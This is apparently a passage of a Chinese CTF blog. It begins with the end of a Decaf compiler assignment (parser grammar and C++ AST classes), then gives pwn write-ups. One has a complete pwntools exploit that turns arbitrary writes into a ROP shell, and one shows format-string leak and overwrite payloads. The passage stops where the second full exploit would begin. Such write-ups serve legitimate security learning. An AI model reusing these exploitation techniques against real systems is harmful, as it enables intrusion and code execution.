decafAllexp *exp = (decafAllexp *)$3;
decafBlock *if_block = (decafBlock *)$5;
decafIF *ifs = new decafIF(exp,if_block,NULL);
$$ = ifs;
}
;

state_while: T_WHILE T_LPAREN exp T_RPAREN blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *block = (decafBlock *)$5;
decafWhile *whiles = new decafWhile(exp,block);
$$ = whiles;
}
;

state_for: T_FOR T_LPAREN assignss T_SEMICOLON exp T_SEMICOLON assignss T_RPAREN blockt{
decafAllexp *exp = (decafAllexp *)$5;
decafBlock *block = (decafBlock *)$9;
decafAssignList *aslist = (decafAssignList *)$3;
decafAssignList *aslist2 = (decafAssignList *)$7;
decafFor * fors = new decafFor(exp,block,aslist,aslist2);
$$ = fors;
}
;

state_break: T_BREAK {
decafOutput * data = new decafOutput("BreakStmt");
$$ = data;
}
;

state_continue: T_CONTINUE {
decafOutput * data = new decafOutput("ContinueStmt");
$$ = data;
}
;

state_return: T_RETURN T_LPAREN exp T_RPAREN {
decafAllexp *exp = (decafAllexp *)$3;
decafReturn *ret = new decafReturn(exp);
$$ = ret;
}
| T_RETURN T_LPAREN T_RPAREN {
decafReturn *ret = new decafReturn(NULL);
$$ = ret;
}
| T_RETURN {
decafReturn *ret = new decafReturn(NULL);
$$ = ret;
}
;

assignss : assigns {
$$ = $1;
}
| {
decafAssignList *aslist = new decafAssignList();
$$ = aslist;
}
;

assigns: assign T_COMMA assigns {
decafAssignList *aslist = (decafAssignList *)$3;
decafAssign *ass = (decafAssign *)$1;
aslist->push_front(ass);
$$ = aslist;
}
| assign {
decafAssignList *aslist = new decafAssignList();
decafAssign *ass = (decafAssign *)$1;
aslist->push_front(ass);
$$ = aslist;
}
;

assign: lvalue T_ASSIGN exp {
decafVar* var = (decafVar *)$1;
decafAllexp* exp = (decafAllexp *)$3;
decafAssign* ass = new decafAssign(var->get_name(),exp,NULL);
ass->put_arr(var->get_arr());
$$ = ass;
}
;

exp : T_ID { decafAllexp * exp = new decafAllexp(*$1,"VariableExpr"); $$ = exp; delete $1;}
| T_ID T_LSB exp T_RSB {
decafAllexp * exp = (decafAllexp *)$3;
decafArrexp * arr = new decafArrexp(*$1,exp);
$$ = arr;
delete $1;
}
| T_INTCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"NumberExpr"); $$ = exp; }
| T_CHARCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"NumberExpr"); $$ = exp; }
| T_STRINGCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"StringConstant"); $$ = exp; }
| T_TRUE { decafAllexp * exp = new decafAllexp("True","BoolExpr"); $$ = exp; }
| T_FALSE { decafAllexp * exp = new decafAllexp("False","BoolExpr"); $$ = exp; }
| method_call { $$ = $1; }
| T_NOT exp { decafUnaryexp * exp = new decafUnaryexp("Not", (decafAllexp*)$2); $$ = exp; }
| T_MINUS exp %prec T_UMINUS { decafUnaryexp * exp = new decafUnaryexp("UnaryMinus", (decafAllexp*)$2); $$ = exp; }
| exp T_PLUS exp { decafBinexp * exp = new decafBinexp("Plus", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_MINUS exp { decafBinexp * exp = new decafBinexp("Minus", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_MULT exp { decafBinexp * exp = new decafBinexp("Mult", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_DIV exp { decafBinexp * exp = new decafBinexp("Div", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_MOD exp { decafBinexp * exp = new decafBinexp("Mod", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_LEFTSHIFT exp { decafBinexp * exp = new decafBinexp("Leftshift", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_RIGHTSHIFT exp { decafBinexp * exp = new decafBinexp("Rightshift", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_LEQ exp { decafBinexp * exp = new decafBinexp("Leq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_GEQ exp { decafBinexp * exp = new decafBinexp("Geq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_LT exp { decafBinexp * exp = new decafBinexp("Lt", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_GT exp { decafBinexp * exp = new decafBinexp("Gt", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_EQ exp { decafBinexp * exp = new decafBinexp("Eq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_NEQ exp { decafBinexp * exp = new decafBinexp("Neq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_AND exp { decafBinexp * exp = new decafBinexp("And", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_OR exp { decafBinexp * exp = new decafBinexp("Or", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| T_LPAREN exp T_RPAREN { $$ = $2; }
;

method_call: T_ID T_LPAREN para_list_use T_RPAREN {
decafFunCall *call = new decafFunCall();
decafStmtList* para = (decafStmtList*)$3;
call->put_name($1);
call->put_para(para->get_para());
$$ = call;
delete $1;
}
;

%%

int main() {
// parse the input and create the abstract syntax tree
int retval = yyparse();
return(retval >= 1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

其中用到的类与函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
#include "default-defs.h"
#include <list>
#include <ostream>
#include <iostream>
#include <sstream>
#include <map>

#ifndef YYTOKENTYPE
#include "decafast.tab.h"
#endif

using namespace std;

/// decafAST - Base class for all abstract syntax tree nodes.
class decafAST {
public:
virtual ~decafAST() {}
virtual string str() { return string(""); }
};

string getString(decafAST *d) {
if (d != NULL) {
return d->str();
} else {
return string("None");
}
}

template <class T>
string commaList(list<T> vec) {
string s("");
for (typename list<T>::iterator i = vec.begin(); i != vec.end(); i++) {
s = s + (s.empty() ? string("") : string(",")) + (*i)->str();
}
if (s.empty()) {
s = string("None");
}
return s;
}

class decafAllexp : public decafAST {
string Kind;
string Name;
public:
string get_name(){return this->Name; }
decafAllexp(string name,string kind) : Name(name),Kind(kind){
map<string,int> tab = {
{"'\\t'",'\t'},
{"'\\r'",'\r'},
{"'\\n'",'\n'},
{"'\\a'",'\a'},
{"'\\v'",'\v'},
{"'\\b'",'\b'},
{"'\\f'",'\f'},
{"'\\\\'",'\\'},
{"'\\\''",'\''},
{"'\\\"'",'\"'},
};
if( kind == "NumberExpr"){
if(tab.count(this->Name)){
this->Name = to_string(tab[this->Name]);
}
else if(this->Name.size() == 1){
this->Name = to_string(Name[0]-48);
}
else if(this->Name.size() == 3 && ( this->Name[0]=='\'' || this->Name[0]=='\"' )){
this->Name = to_string(Name[1]);
}
}
}
string str() { return Kind + "(" + Name + ")"; }
};

class decafArrexp : public decafAST {
string Name;
decafAllexp * Exp;
public:
decafArrexp(string Name, decafAllexp *Exp)
: Name(Name), Exp(Exp) {}
string str() { return string("ArrayLocExpr") + "(" + Name + "," + getString(Exp) + ")"; }
};

class decafBinexp : public decafAST {
string Option;
decafAllexp * Exp1;
decafAllexp * Exp2;
public:
decafBinexp(string op, decafAllexp *exp1, decafAllexp *exp2)
: Option(op), Exp1(exp1), Exp2(exp2) {}
string str() { return string("BinaryExpr") + "(" + Option + "," + getString(Exp1) + "," + getString(Exp2) + ")"; }
};

class decafUnaryexp : public decafAST {
string Option;
decafAllexp * Exp1;
public:
decafUnaryexp(string op, decafAllexp *exp1)
: Option(op), Exp1(exp1) {}
string str() { return string("UnaryExpr") + "(" + Option + "," + getString(Exp1) + ")"; }
};

class decafType : public decafAST {
string Type;
string Name;
public:
string get_type(){return this->Type; }
void put_name(string Name){ this->Name = Name;}
decafType(string Type){this->Type = Type;}
string str() {
if(Name != ""){
return "VarDef("+Name+","+Type+")";
}
else{
return "VarDef("+Type+")";
}
}
};

class decafVar : public decafAST {
string Type;
string Name;
string Kind;
decafAllexp* Exp;
decafAllexp* Arr;
public:
decafVar(string Name) {this->Name = Name;}
string get_type(){return this->Type;}
string get_name(){return this->Name;}
decafAllexp* get_arr(){return this->Arr;}
decafAllexp* get_exp(){return this->Exp;}
void put_type(string Type){this->Type = Type;}
void put_name(string Name){this->Name = Name;}
void put_kind(string Kind){
if(this->Kind == "")
this->Kind = Kind;
}
void put_arr(decafAllexp* Arr){this->Arr = Arr;}
void put_exp(decafAllexp* Exp){this->Exp = Exp;}
string str() {
if(Exp != NULL){
return "AssignGlobalVar("+Name+","+Type+","+getString(Exp)+")";
}
else if(Kind != "" && Name != ""){
return "FieldDecl("+Name+","+Type+","+Kind+")";
}
else if(Name != ""){
return "VarDef("+Name+","+Type+")";
}
else{
return "VarDef("+Type+")";
}
}
};

class decafVarList : public decafAST {
list<decafVar*> List;
public:
list<decafVar*> get_list(){return this->List; }
int size() { return List.size(); }
void push_front(decafVar *e) { List.push_front(e); }
void push_back(decafVar *e) { List.push_back(e); }
void cat_front(decafVarList* List) {
list<decafVar*> l = List->get_list();
for(auto e:l){
this->List.push_front(e);
}
}
void put_types(string Type){
for(auto e:this->List){
e->put_type(Type);
}
}
void put_kinds(string Kind){
for(auto e:this->List){
e->put_kind(Kind);
}
}
string str() {return commaList<class decafVar *>(List);}
};


/// decafStmtList - List of Decaf statements
class decafStmtList : public decafAST {
list<decafAST *> stmts;
public:
decafStmtList() {}
~decafStmtList() {
for (list<decafAST *>::iterator i = stmts.begin(); i != stmts.end(); i++) {
delete *i;
}
}
int size() { return stmts.size(); }
void push_front(decafAST *e) { stmts.push_front(e); }
void push_back(decafAST *e) { stmts.push_back(e); }
list<decafAST *> get_para(){return stmts; }
string str() { return commaList<class decafAST *>(stmts); }
};

class decafAssign : public decafAST {
string Var;
bool key;
decafAllexp* Arr;
decafAllexp* Exp;
decafAllexp* Exp2;
public:
void put_arr(decafAllexp* Arr){this->Arr = Arr;}
void put_key(bool key){this->key = key;}
decafAssign(string Var,decafAllexp* Exp,decafAllexp* Exp2):Var(Var),Exp(Exp),Exp2(Exp2){}
string str() {
if(Arr == NULL)
return string("AssignVar") + "(" + Var + "," + getString(Exp) + ")";
else
return string("AssignArrayLoc") + "(" + Var + "," + getString(Arr)+","+ getString(Exp) + ")";
}
};

class decafAssignList : public decafAST {
list<decafAssign *>List;
public:
int size() { return List.size(); }
void push_front(decafAssign *e) { List.push_front(e); }
void push_back(decafAssign *e) { List.push_back(e); }
void put_keys(bool key){
for(auto ass:List){
ass->put_key(key);
}
}
string str() {
return commaList<class decafAssign *>(List);
}
};

class decafFunCall : public decafAST {
string Name;
list<decafAST *> Para;
public:
void put_para(list<decafAST *> Para){ this->Para = Para; }
void put_name(string *Name){ this->Name = *Name; }
string str() {
return string("MethodCall") + "(" + Name + "," + commaList<class decafAST *>(Para) + ")";
}
};

class decafOutput : public decafAST {
string Data;
public:
decafOutput(string Data){this->Data = Data;}
string str() { return Data; }
};

class decafPara : public decafAST {
list<decafType *> Para;
public:
int size() { return Para.size(); }
void push_front(decafType *e) { Para.push_front(e); }
void push_back(decafType *e) { Para.push_back(e); }
list<decafType *> get_para(){return Para; }
string str() { return commaList<class decafType *>(Para); }
};

class PackageAST : public decafAST {
string Name;
decafVarList *FieldDeclList;
decafStmtList *MethodDeclList;
public:
PackageAST(string name, decafVarList *fieldlist, decafStmtList *methodlist)
: Name(name), FieldDeclList(fieldlist), MethodDeclList(methodlist) {}
~PackageAST() {
if (FieldDeclList != NULL) { delete FieldDeclList; }
if (MethodDeclList != NULL) { delete MethodDeclList; }
}
string str() {
return string("Package") + "(" + Name + "," + getString(FieldDeclList) + "," + getString(MethodDeclList) + ")";
}
};

class decafFuncDef : public decafAST {
string Name;
string Type;
decafPara * Para;
decafStmtList * Block;
public:
void put_para(decafPara * Para){ this->Para = Para;}
void put_name(string *Name){ this->Name = *Name; }
void put_type(string Type){ this->Type = Type; }
void put_block(decafStmtList *Block){ this->Block = Block; }
string str() {
return string("Method") + "(" + Name + "," + Type + "," + getString(Para) + "," + getString(Block) + ")";
}
};

class decafEXFuncDef : public decafAST {
string Name;
string Type;
decafPara* Para;
public:
void put_para(decafPara* Para){ this->Para = Para;}
void put_name(string *Name){ this->Name = *Name; }
void put_type(string Type){ this->Type = Type; }
string str() {
return string("ExternFunction") + "(" + Name + "," + Type + "," + getString(Para) + ")";
}
};

class decafBlock : public decafAST {
string Kind;
decafStmtList *FieldDeclList;
decafStmtList *StateDeclList;
public:
decafBlock(string kind,decafStmtList *fieldlist, decafStmtList *methodlist)
: Kind(kind), FieldDeclList(fieldlist), StateDeclList(methodlist) {}
~decafBlock() {
if (FieldDeclList != NULL) { delete FieldDeclList; }
if (StateDeclList != NULL) { delete StateDeclList; }
}
string str() {
return Kind + "(" + getString(FieldDeclList) + "," + getString(StateDeclList) + ")";
}
};

class decafIF : public decafAST {
decafAllexp * Exp;
decafBlock * Block;
decafBlock * Block2;
public:
decafIF(decafAllexp * Exp,decafBlock * Block,decafBlock * Block2): Exp(Exp),Block(Block),Block2(Block2){}
string str() {
return string("IfStmt") + "(" + getString(Exp) +"," + getString(Block) + "," + getString(Block2) + ")";
}
};

class decafWhile : public decafAST {
decafAllexp * Exp;
decafBlock * Block;
public:
decafWhile(decafAllexp * Exp,decafBlock * Block): Exp(Exp),Block(Block){}
string str() {
return string("WhileStmt") + "(" + getString(Exp) +"," + getString(Block) + ")";
}
};

class decafFor : public decafAST {
decafAllexp * Exp;
decafBlock * Block;
decafAssignList *List;
decafAssignList *List2;
public:
decafFor(decafAllexp * Exp,decafBlock * Block,decafAssignList *List,decafAssignList *List2): Exp(Exp),Block(Block),List(List),List2(List2){}
string str() {
return string("ForStmt") + "(" + getString(List)+","+getString(Exp) +","+getString(List2)+","+getString(Block) + ")";
}
};

class decafReturn : public decafAST {
decafAllexp * Exp;
public:
decafReturn(decafAllexp * Exp){ this->Exp = Exp; }
string str() { return string("ReturnStmt") + "(" + getString(Exp) + ")"; }
};

/// ProgramAST - the decaf program
class ProgramAST : public decafAST {
decafStmtList *ExternList;
PackageAST *PackageDef;
public:
ProgramAST(decafStmtList *externs, PackageAST *c) : ExternList(externs), PackageDef(c) {}
~ProgramAST() {
if (ExternList != NULL) { delete ExternList; }
if (PackageDef != NULL) { delete PackageDef; }
}
string str() { return string("Program") + "(" + getString(ExternList) + "," + getString(PackageDef) + ")"; }
};

最终拿到了满分:

1
2
3
4
➜  decafast git:(master) ✗ python3 check.py 
Correct(dev): 134 / 134
Score(dev): 134.00
Total Score: 134.00

easy_pwneasy

1
2
3
4
5
6
pwneasy: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c3f0880bf68ea5bca97853dd259cf44c5f1f9e5a, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,NX,PIE

漏洞思路

1
2
3
4
5
6
7
8
9
10
11
for ( i = 0; i <= 2; ++i )
{
printf("give me address: ");
read(0, buf_addr, 0x20uLL);
addr = (_QWORD *)atoll(buf_addr);
printf("give me value: ");
read(0, buf_value, 0x20uLL);
value = atoll(buf_value);
set(addr, value);
printf("OK %s = %s\n", buf_addr, buf_value);
}
  • 程序非常简洁,就只有3次任意地址写的机会

程序提供的功能太少,我的第一反应是看看栈上有没有遗留的地址可以利用:

1
pwn(1,1)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pwndbg> telescope 0x7ffc64422df0-0x60 /* buf_value */
00:0000│ rsp rcx-1 0x7ffc64422d90 ◂— 0x31 /* '1' */
01:00080x7ffc64422d98 ◂— 0x0
02:00100x7ffc64422da0 —▸ 0x7fe493363600 (_IO_file_jumps) ◂— 0x0
03:00180x7ffc64422da8 —▸ 0x7fe4931d762d (_IO_file_setbuf+13) ◂— test rax, rax
04:00200x7ffc64422db0 —▸ 0x7fe493367631 ◂— 0xd700007fe4933271
05:00280x7ffc64422db8 —▸ 0x7fe4931ce765 (setvbuf+245) ◂— cmp rax, 1
06:00300x7ffc64422dc0 ◂— 0x0
07:00380x7ffc64422dc8 —▸ 0x7ffc64422df0 —▸ 0x7ffc64422e00 ◂— 0x1
pwndbg> telescope 0x7ffc64422df0-0x40 /* buf_addr */
00:00000x7ffc64422db0 —▸ 0x7fe493367631 ◂— 0xd700007fe4933271
01:00080x7ffc64422db8 —▸ 0x7fe4931ce765 (setvbuf+245) ◂— cmp rax, 1
02:00100x7ffc64422dc0 ◂— 0x0
03:00180x7ffc64422dc8 —▸ 0x7ffc64422df0 —▸ 0x7ffc64422e00 ◂— 0x1
04:00200x7ffc64422dd0 —▸ 0x7ffc64422f18 —▸ 0x7ffc644240ee ◂— './pwneasy1'
05:00280x7ffc64422dd8 ◂— 0x1
06:00300x7ffc64422de0 ◂— 0x1
07:00380x7ffc64422de8 ◂— 0x904db1c7
  • 在 buf_addr 处有 libc 中遗留的地址,合理的覆盖低位就可以泄露 libc
  • 有 libc 任意写的机会

入侵思路

程序只提供了3次任意写的机会,但是我们可以通过覆盖 i 来将这个机会提升至无限次

覆盖 libc 末地址就可以泄露 libc_base:

1
2
3
4
5
6
pwn(p8(0x80),0)
p.recvuntil("OK ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x21a680
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

用同样的方法泄露遗留在栈上的栈地址,基于栈地址就可以覆盖 i 了:

1
2
3
4
5
6
7
8
pwn("0"*0x18,0)
p.recvuntil("OK 000000000000000000000000")
stack_addr = u64(p.recv(6).ljust(8,"\x00"))
valuei_addr = stack_addr - 8
success("stack_addr >> "+hex(stack_addr))
success("valuei_addr >> "+hex(valuei_addr))

pwn(str(valuei_addr)+"\n",0xffffffff00000000)

最后打栈溢出就可以了,不过直接调用 system 会触发段错误,于是我们选择执行 syscall

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
# -*- coding:utf-8 -*-
from inspect import stack
from multiprocessing.dummy import Value
from random import randrange
from pwn import *

arch = 64
challenge = './pwneasy1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x1283)\nb *$rebase(0x12B8)\n")
pause()

def cmd(op):
sla(">",str(op))

def pwn(addr,data):
sa("give me address: ",str(addr))
sa("give me value: ",str(data))

pwn(p8(0x80),0)
p.recvuntil("OK ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x21a680
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

pwn("0"*0x18,0)
p.recvuntil("OK 000000000000000000000000")
stack_addr = u64(p.recv(6).ljust(8,"\x00"))
valuei_addr = stack_addr - 8
success("stack_addr >> "+hex(stack_addr))
success("valuei_addr >> "+hex(valuei_addr))

pwn(str(valuei_addr)+"\n",0xffffffff00000000)
pop_rdi_ret = libc_base + 0x000000000002a3e5
pop_rsi_ret = libc_base + 0x000000000002be51
pop_rdx_r12_ret = libc_base + 0x000000000011f497
syscall = libc_base + 0x0000000000029db4
system = libc_base + libc.sym["system"]
binsh_addr = libc_base + 0x1d8698
success("system >> "+hex(system))

pwn(str(valuei_addr)+"\n",0xffffffff00000000)
pwn(str(stack_addr+8)+"\n",str(pop_rdi_ret)+"\n")
pwn(str(stack_addr+8*2)+"\n",str(binsh_addr)+"\n")

pwn(str(valuei_addr)+"\n",0xffffffff00000000)
pwn(str(stack_addr+8*3)+"\n",str(pop_rdx_r12_ret)+"\n")
pwn(str(stack_addr+8*4)+"\n",str(0)+"\n")
pwn(str(stack_addr+8*5)+"\n",str(0)+"\n")

pwn(str(valuei_addr)+"\n",0xffffffff00000000)
pwn(str(stack_addr+8*6)+"\n",str(pop_rsi_ret)+"\n")
pwn(str(stack_addr+8*7)+"\n",str(0)+"\n")
pwn(str(stack_addr+8*8)+"\n",str(syscall)+"\n")

#debug()
pwn(str(valuei_addr)+"\n",0x300000000)

p.interactive()

the_bad_touch

1
2
3
4
5
6
bad: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=37fe215b6944a1cb29f0a404c1071f7cf67baaaf, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,PIE,NX

漏洞分析

两次格式化字符串漏洞:

1
2
3
4
5
void program()
{
doit();
doit();
}
1
2
3
4
5
6
7
8
9
10
void doit()
{
void *chunk; // [rsp+8h] [rbp-8h]

chunk = malloc(0x3E8uLL);
printf("try it: ");
read(0, chunk, 0x3E8uLL);
printf((const char *)chunk);
free(chunk);
}

入侵思路

有格式化字符串漏洞但是缓冲区在堆中,通过当前寄存器和栈可以泄露 heap_base,libc_base,libc_base,stack_addr:

1
2
3
4
5
6
*RCX  0x7faea9be9992 (read+18) ◂— cmp    rax, -0x1000 /* 'H=' */
*RDX 0x3e8
*RDI 0x555eeb6c32a0 ◂— '%3$p\n%1$p\n\n'
*RSI 0x555eeb6c32a0 ◂— '%3$p\n%1$p\n\n'
*R8 0x8
*R9 0x555eeb6c32a0 ◂— '%3$p\n%1$p\n\n'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
payload = "%3$p\n%1$p\n%9$p\n"
sla("try it: ",payload)

leak_addr = eval(p.recvuntil("\n")[:-1])
libc_base = leak_addr - 0x114992
leak_addr = eval(p.recvuntil("\n")[:-1])
heap_base = leak_addr - 0x2a0
leak_addr = eval(p.recvuntil("\n")[:-1])
pro_base = leak_addr - 0x1248
success("libc_base >> "+hex(libc_base))
success("heap_base >> "+hex(heap_base))
success("pro_base >> "+hex(pro_base))

io_list_all = libc_base + libc.sym["_IO_list_all"]
one_gadget = libc_base + 0xebcf1
success("io_list_all >> "+hex(io_list_all))
success("one_gadget >> "+hex(one_gadget))

接着就需要用到非栈上 fmt 的技巧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
pwndbg> telescope 0x7fff32e28280
00:0000│ rsp 0x7fff32e28280 —▸ 0x7fff32e283c8 —▸ 0x7fff32e290d6 ◂— 0x4c00316461622f2e /* './bad1' */
01:00080x7fff32e28288 —▸ 0x55b00dcf82a0 ◂— '%10c$13hn\n'
02:0010│ rbp 0x7fff32e28290 —▸ 0x7fff32e282a0 —▸ 0x7fff32e282b0 ◂— 0x1
03:00180x7fff32e28298 —▸ 0x55b00ce2e252 ◂— nop
04:00200x7fff32e282a0 —▸ 0x7fff32e282b0 ◂— 0x1
05:00280x7fff32e282a8 —▸ 0x55b00ce2e26d ◂— mov eax, 0
06:00300x7fff32e282b0 ◂— 0x1
07:00380x7fff32e282b8 —▸ 0x7fb072b0bd90 (__libc_start_call_main+128) ◂— mov edi, eax
08:00400x7fff32e282c0 ◂— 0x0
09:00480x7fff32e282c8 —▸ 0x55b00ce2e255 ◂— push rbp
0a:00500x7fff32e282d0 ◂— 0x100000000
0b:00580x7fff32e282d8 —▸ 0x7fff32e283c8 —▸ 0x7fff32e290d6 ◂— 0x4c00316461622f2e /* './bad1' */
0c:00600x7fff32e282e0 ◂— 0x0
0d:00680x7fff32e282e8 ◂— 0x1149dda85894f8f3
0e:00700x7fff32e282f0 —▸ 0x7fff32e283c8 —▸ 0x7fff32e290d6 ◂— 0x4c00316461622f2e /* './bad1' */
0f:00780x7fff32e282f8 —▸ 0x55b00ce2e255 ◂— push rbp
10:00800x7fff32e28300 —▸ 0x55b00ce30dd8 —▸ 0x55b00ce2e130 ◂— endbr64
11:00880x7fff32e28308 —▸ 0x7fb072d46040 (_rtld_global) —▸ 0x7fb072d472e0 —▸ 0x55b00ce2d000 ◂— 0x10102464c457f
12:00900x7fff32e28310 ◂— 0xeeb7b86d5d16f8f3
13:00980x7fff32e28318 ◂— 0xee2938c9221ef8f3

对于非栈上 fmt 有两个关键点:

  • 修改栈指针,使两个栈指针最终指向同一片空间(需要修改的目标)
  • 覆盖返回地址写循环

位于 0x7fff32e282900x7fff32e282a0 这两处地址的空间正好符合条件,在实际利用的过程中遇到了一下问题:

  • %n 修改过的栈空间并不能第一时间生效(第二个 %n 不会识别修改后的数据,而是会识别修改前的)
  • printf 不会调用 buffered_vfprintf 而是直接 jmp 过去(这意味着不能通过覆盖 __vfprintf_internal 的返回地址来实现循环)

最后想出的解决办法是:第一次 fmt 使用 1/4096 的概率修改栈指针为函数 doit 的返回地址

1
2
3
4
magic = 0xdbe8-0x38
payload = "%3$p\n%1$p\n%9$p\n%6$p\n"
payload += "%{}c%8$hn\n".format(magic)
sla("try it: ",payload)

在后续操作中交替覆盖函数 doit 的返回地址和函数 main 的返回地址,构造出 ROP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
def pwn(target):
global magic_stack2
if(target < 0x10000):
payload = "%{}c%8$hn\n%{}c%10$hn\n".format(magic_stack1,magic_gadget-1-magic_stack1).ljust(0x60,"\x00")
sla("try it: ",payload)
magic_stack2 = magic_stack2 + 8

for i in range(3):
magic_gadget = (target >> 16*i)%0x10000

success("magic_gadget >> "+hex(magic_gadget))
if(magic_stack1 > magic_gadget):
payload = "%{}c%10$hn\n%{}c%8$hn\n".format(magic_gadget,magic_stack1-1-magic_gadget).ljust(0x60,"\x00")
sla("try it: ",payload)
else:
payload = "%{}c%8$hn\n%{}c%10$hn\n".format(magic_stack1,magic_gadget-1-magic_stack1).ljust(0x60,"\x00")
sla("try it: ",payload)

y = i+1
if(i == 2):
magic_stack2 = magic_stack2 + 8
y = 0

if(magic_stack2 > magic_main):
payload = "%{}c%10$hn\n%{}c%8$hn\n".format(magic_main,magic_stack2-1+2*y-magic_main).ljust(0x60,"\x00")
sla("try it: ",payload)
else:
payload = "{}c%8$hn\n%{}c%10$hn\n%".format(magic_stack2,magic_main-1+2*y-magic_stack2).ljust(0x60,"\x00")
sla("try it: ",payload)

还有最后一个问题:由于破坏了栈结构,导致 system("/bin/sh") 失效,如果构造 execve("/bin/sh",0,0) 则会受到格式化字符串 %n 的限制(写入的数据不能为“0”)

此时我们可以先构造 sys_read(0,stack,size),然后在栈上输入 ROP(利用 gadget 控制对应寄存器为“0”即可)

在 DEBUG 模式的配合下,勉强写出了可以在 DEBUG 模式中打通的 exp,但正常执行的程序怎么都爆破不出来,后来发现是 DEBUG 模式和正常模式的栈空间不太一样,修正 exp 后理论上可以爆破出 flag(关闭随机化后就可以打出 flag,但 1/4096 的概率太低了)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
